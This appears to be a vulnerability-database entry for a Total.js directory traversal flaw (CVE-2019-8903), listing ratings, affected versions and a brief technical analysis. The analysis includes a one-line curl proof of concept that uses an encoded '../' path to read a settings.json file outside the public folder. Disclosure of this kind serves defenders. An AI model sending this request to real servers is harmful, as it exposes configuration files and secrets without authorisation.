Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

Total.js requestcontinue Directory Traversal Vulnerability

Disclosure Date: February 18, 2019 Last updated November 13, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.

Add Assessment

2
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Common in enterpriseEasy to weaponizeUnauthenticatedVulnerable in default configuration
Technical Analysis

Totaljs – Unathenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json

#(note that .json is in the extensions list by def.)

Log in to Add Reply

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
2.1.0 - 2.1.1
2.2.0 - 2.2.1
2.3.0 - 2.3.1
2.4.0 - 2.4.1
2.5.0 - 2.5.1
2.6.0 - 2.6.3
2.7.0 - 2.7.1
2.8.0 - 2.8.1
2.9.0 - 2.9.5
3.0.0 - 3.0.1
3.1.0 - 3.1.1
3.2.0 - 3.2.4
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis